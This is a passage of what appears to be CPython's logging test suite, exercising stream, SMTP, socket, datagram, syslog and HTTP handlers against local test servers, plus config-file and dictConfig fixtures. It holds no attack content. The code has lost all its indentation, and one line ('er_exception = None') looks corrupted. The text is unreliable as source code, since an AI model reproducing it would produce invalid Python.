time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
actual = h.setStream(old)
self.assertIsNone(actual)
class TestSMTPServer(smtpd.SMTPServer):
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
class SMTPHandlerTest(BaseTest):
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines)
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
config2 = config1.replace("sys.stdout", "sys.stbout")
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
self.assert_log_lines([])
def test_config2_failure(self):
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
hyphenated = logging.getLogger('compiler-hyphenated')
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
BaseTest.setUp(self)
er_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
def setUp(self):
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
def setUp(self):
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
s = stream.getvalue()
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
